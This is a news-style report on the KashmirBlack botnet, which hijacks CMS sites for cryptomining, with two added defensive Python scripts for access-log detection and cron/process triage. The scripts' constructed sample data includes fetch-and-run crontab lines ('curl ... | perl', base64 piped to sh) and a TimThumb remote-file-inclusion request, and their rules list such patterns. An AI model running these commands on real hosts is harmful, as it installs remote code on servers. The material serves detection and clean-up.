The highly sophisticated botnet, named KashmirBlack, is believed to have infected hundreds of thousands of websites by attacking their underlying CMS platforms, according to US-based cyber security firm Imperva. The main victims are sites running WordPress, Drupal and similar CMS platforms.
The botnet's prime purpose appears to be infecting websites and then using their servers for cryptocurrency mining.
The botnet's command-and-control (C&C) infrastructure is operated by hackers based in Indonesia.
The botnet is the work of a hacker named “Exect1337”, a member of the Indonesian hacker crew PhantomGhost.
“The KashmirBlack C&C has three main roles: Supply a Perl script that infects the victim server with the botnet malicious script, receive reports of findings and attack results from bots and supply bots with attack instructions.” Most of the victim sites are in the US.
The KashmirBlack C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction with the newly found sites, and pushes it into a queue waiting for bots to receive them and attack.
The team found more than 20 distinct exploits.
- PHPUnit Remote Code Execution – CVE-2017-9841
- jQuery file upload vulnerability – CVE-2018-9206
- ELFinder Command Injection – CVE-2019-9194
- Joomla! remote file upload vulnerability
- Magento Local File Inclusion – CVE-2015-2067
- Magento Webforms Upload Vulnerability
- CMS Plupload Arbitrary File Upload
- Yeager CMS vulnerability – CVE-2015-7571
- Multiple vulnerabilities including File Upload & RCE for many plugins in multiple platforms here
- WordPress TimThumb RFI Vulnerability – CVE-2011-4106
- Uploadify RCE vulnerability
- vBulletin Widget RCE – CVE-2019-16759
- WordPress install.php RCE
- WordPress xmlrpc.php Login Brute-Force attack
- WordPress multiple Plugins RCE (see full list here)
- WordPress multiple Themes RCE (see full list here)
- WebDAV file upload vulnerability
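Several of the exploits above are visible in ordinary web-server access logs as requests to a handful of well-known endpoints, and the C&C scanner described earlier shows up as one source hitting several of them in a row. The following script is an added example, not code from Imperva or from the article: it parses combined-format access log lines, tags requests that touch the endpoints named on the page (xmlrpc.php, install.php, TimThumb, plus the PHPUnit eval-stdin.php entry point behind CVE-2017-9841 and generic upload handlers), and reports both xmlrpc.php brute-force sources and scanner-like sources. The log lines, the IP addresses and the thresholds are constructed assumptions for the example.

```python
"""Detection over web-server access logs for the KashmirBlack attack surface.

Added example with constructed data; thresholds and sample traffic are assumptions.
"""
import re
from collections import Counter, defaultdict

# Combined log format: ip ident user [ts] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints tied to exploits listed in the article (matched on the path only,
# query string stripped). The PHPUnit path is the published CVE-2017-9841 entry point.
PATH_RULES = {
    "wp-xmlrpc-bruteforce": re.compile(r"/xmlrpc\.php$"),
    "wp-install": re.compile(r"/wp-admin/install\.php$"),
    "timthumb-rfi": re.compile(r"timthumb\.php$", re.I),
    "phpunit-eval-stdin": re.compile(r"/eval-stdin\.php$"),
    "generic-upload-handler": re.compile(r"/upload\.php$|/upload/", re.I),
}


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def classify(path):
    """Return the first matching rule name for a request path, or None."""
    bare = path.split("?", 1)[0]
    for name, rx in PATH_RULES.items():
        if rx.search(bare):
            return name
    return None


def analyze(log_text, xmlrpc_threshold=5, scanner_rules=2):
    """Summarise suspicious activity: per-request hits, brute-force sources,
    and sources that probe several distinct vulnerable endpoints (scanner-like)."""
    xmlrpc_posts = Counter()
    rules_by_ip = defaultdict(set)
    hits = []
    for rec in parse(log_text):
        rule = classify(rec["path"])
        if rule is None:
            continue
        hits.append((rec["ip"], rule, rec["path"]))
        rules_by_ip[rec["ip"]].add(rule)
        if rule == "wp-xmlrpc-bruteforce" and rec["method"] == "POST":
            xmlrpc_posts[rec["ip"]] += 1
    return {
        "hits": hits,
        "bruteforce_ips": sorted(ip for ip, n in xmlrpc_posts.items() if n >= xmlrpc_threshold),
        "scanner_ips": sorted(ip for ip, r in rules_by_ip.items() if len(r) >= scanner_rules),
    }


def _line(ip, sec, method, path, status=200):
    """Build one constructed combined-format log line (test data, not real traffic)."""
    return (f'{ip} - - [20/Oct/2020:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


# Constructed sample: one xmlrpc.php brute-forcer, one multi-endpoint scanner,
# one normal visitor and one single legitimate-looking xmlrpc.php call.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", s, "POST", "/xmlrpc.php") for s in range(6)]
    + [
        _line("198.51.100.23", 10, "GET", "/wp-admin/install.php?step=1"),
        _line("198.51.100.23", 11, "GET",
              "/wp-content/themes/demo/timthumb.php?src=http://example.com/x.php"),
        _line("198.51.100.23", 12, "GET",
              "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 404),
        _line("192.0.2.10", 20, "GET", "/index.php"),
        _line("192.0.2.11", 21, "POST", "/xmlrpc.php"),
    ]
)

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("brute-force sources:", report["bruteforce_ips"])
    print("scanner-like sources:", report["scanner_ips"])
    for ip, rule, path in report["hits"]:
        print(f"{ip:15} {rule:24} {path}")
```

Run against a real log with `analyze(open("/var/log/apache2/access.log").read())`; the single legitimate-looking xmlrpc.php POST stays below the threshold, while a TimThumb request whose `src=` points at a remote host is the RFI pattern the page's entry refers to, so it is worth alerting on even when the path rule alone fires.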
The team advised several actions that should be performed in case your server is infected by the KashmirBlack botnet.
“Kill malicious processes, remove malicious files, remove suspicious and unfamiliar jobs and remove unused plugins and themes”.
The site administrator should ensure the CMS core files and third-party modules are always up-to-date and properly configured.
“Strong and unique passwords are recommended, as they are the first defence against brute force attacks.”
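The clean-up advice above ("remove suspicious and unfamiliar jobs", "kill malicious processes") is easier to act on with a small triage helper that scores cron entries and process command lines for the patterns a server-side infection like this typically leaves: a download piped straight into an interpreter (the C&C in this case supplies a Perl script), execution out of a temp directory, hidden directories and inline decoding. The script below is an added example, not Imperva's tooling; the crontab content, the address in it and the list of checks are constructed assumptions, and a flagged entry is a lead for an administrator to confirm, not proof of compromise.

```python
"""Triage helper for cron jobs and process command lines after a CMS-host infection.

Added example; the crontab text and the check list are assumptions for illustration.
"""
import re

# Each check is (reason, pattern). Order determines the order of reported reasons.
CHECKS = [
    ("download piped to interpreter",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash|perl|php|python)\b")),
    ("executes from temp dir", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")),
    ("hidden path component", re.compile(r"/\.[^/\s]+/")),
    ("base64 decode in command", re.compile(r"base64\s+(-d|--decode)\b")),
    ("inline perl/php one-liner", re.compile(r"\b(perl|php)\s+-[er]\b")),
]


def flag_command(cmd):
    """Return the list of reasons a command string looks suspicious (empty if none).
    Works for a cron command or for a line of `ps -eo args` output alike."""
    return [reason for reason, rx in CHECKS if rx.search(cmd)]


def _command_part(entry):
    """Strip the schedule from a crontab entry, handling @reboot-style entries."""
    if entry.startswith("@"):
        parts = entry.split(None, 1)
    else:
        parts = entry.split(None, 5)          # five time fields, then the command
        parts = [parts[-1]] if len(parts) == 6 else []
    return parts[-1] if parts else ""


def audit_crontab(text):
    """Return flagged entries as dicts with the raw entry and its reasons."""
    flagged = []
    for raw in text.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#") or re.match(r"^\w+=", entry):
            continue                          # skip comments and VAR=value lines
        reasons = flag_command(_command_part(entry))
        if reasons:
            flagged.append({"entry": entry, "reasons": reasons})
    return flagged


# Constructed crontab (not from a real host): two legitimate jobs, three suspicious ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://198.51.100.77/s.pl | perl
@reboot /tmp/.x/kb.sh
15 2 * * * /var/www/html/scripts/backup.sh
* * * * * echo aGVsbG8= | base64 -d | sh
"""

if __name__ == "__main__":
    for item in audit_crontab(SAMPLE_CRONTAB):
        print(f"{item['entry']}\n    -> {', '.join(item['reasons'])}")
```

On a live host, feed it the output of `crontab -l` for every account plus the files under `/etc/cron.d`, and run `flag_command` over each line of `ps -eo args` to find running processes with the same traits; anything it flags should be checked against the packages and plugins you know to be installed before it is removed.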